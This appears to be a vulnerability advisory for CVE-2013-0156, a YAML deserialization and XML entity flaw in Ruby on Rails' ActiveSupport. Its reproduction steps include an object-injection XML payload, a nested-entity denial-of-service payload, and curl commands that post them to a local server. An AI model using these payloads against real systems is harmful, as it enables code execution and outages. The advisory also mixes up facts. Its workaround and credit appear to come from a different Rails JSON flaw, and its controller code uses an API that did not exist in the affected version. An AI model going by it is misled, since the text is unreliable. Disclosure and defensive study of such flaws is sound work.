Ruby on Rails (often called Rails) is a web application framework written in Ruby that emphasizes convention over configuration and the principle of "don't repeat yourself" (DRY). It provides developers with a structured and efficient way to build database-backed web applications through pre-built patterns for rapid development.
Some versions of Ruby on Rails have an easily exploitable vulnerability in the conversions.rb script, which is part of the Active Support library.
Since the script does not properly restrict casts of string values, an attacker can conduct object-injection attacks and execute arbitrary code. The result may also be denial of service.
Remote code execution flaws are among the Top 10 Open Web Application Security Project (OWASP) vulnerabilities. They are among the most potentially damaging of vulnerabilities because injected, remotely executed code:
- can access internal application objects/methods
- can often bypass security controls
- may persist across sessions
- can often pivot to gain OS-level access.
The Open Web Application Security Project (OWASP) further explains that denial of service (DoS) attacks aim to make a service “unavailable for the purpose it was designed.”
In this case, the vulnerability allows a carefully crafted request that includes nested XML entity references to cause excessive memory or CPU consumption.
Details
Module Info
- Product: Ruby on Rails Framework
- Affected packages: activesupport
- GitHub repository:
https://github.com/rails/rails - Published package: The individual activesupport gem or the entire Rails Framework (which includes activerecord).
- Package manager: gem
Vulnerability Info
The exploit improperly allows dangerous conversion during input processing allowing attackers to execute arbitrary code on the server.
Specifically, YAML data could result in creating unexpected and harmful objects during deserialization.
Moreover, by creating infinitely nested entities or other malicious structures, the exploit could also lead to denial of service through excessive memory or CPU use.
Furthermore, symbols in Ruby are not garbage-collected. If an attacker creates too many symbols ( since the vulnerability allows conversion of arbitrary user input into symbols), it can lead to memory exhaustion.
Steps To Reproduce
1. Install a version of Ruby on Rails vulnerable to CVE-2013-0156, such as Rails 3.2.10:
gem install rails -v 3.2.10
rails _3.2.10_ new vulnerable_app
cd vulnerable_app
bundle install
2. Enable XML Parameter Parsing by editing the config/application.rb file. Ensure that the ActionDispatch::ParamsParser middleware is enabled:
config.middleware.use ActionDispatch::ParamsParser
3. Add a controller with XML Parsing:
rails generate controller TestController
4. In app/controllers/test_controller.rb, add an action that simply logs the parameters:
class TestController < ApplicationController
def create
render json: params.to_unsafe_h
end
end
5. Set up a route for the controller in config/routes.rb:
post '/test', to: 'test#create'
6.Start the Rails server:
rails server
7.Craft a malicious payload to set up arbitrary object execution. Write the following to payload1.xml:
<hash>
<yaml><![CDATA[
--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
default_proc: &1 !ruby/object:Proc {}
]]></yaml>
</hash>
Send the payload with:
curl -X POST -H "Content-Type: application/xml" --data @payload1.xml http://localhost:3000/test
8. To cause denial of service, craft a payload that leverages the exploit by writing this to payload2.xml:
<!DOCTYPE test [
<!ENTITY a "1234567890" >
<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;" >
<!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;" >
]>
<test>
<data>&c;</data>
</test>
Send the payload with:
curl -X POST -H "Content-Type: application/xml" --data @payload2.xml http://localhost:3000/test
Addressing the Issue
To address this vulnerability, users unable to upgrade can change the backend to use JSONGem. Place this code in an application initializer:
ActiveSupport::JSON.backend = "JSONGem"
If you are running Ruby 1.8 you will need to ensure that the json or json_pure gems are installed and in your application's Gemfile.
Ruby 1.9 includes this code already.
Credits
- Lawrence Pit of Mirror42
Mitigation
Users of affected versions of Ruby on Rails should follow one of the following mitigations:
- Upgrade to a corrected version.
- Leverage a commercial support partner like HeroDevs for post-EOL security support.
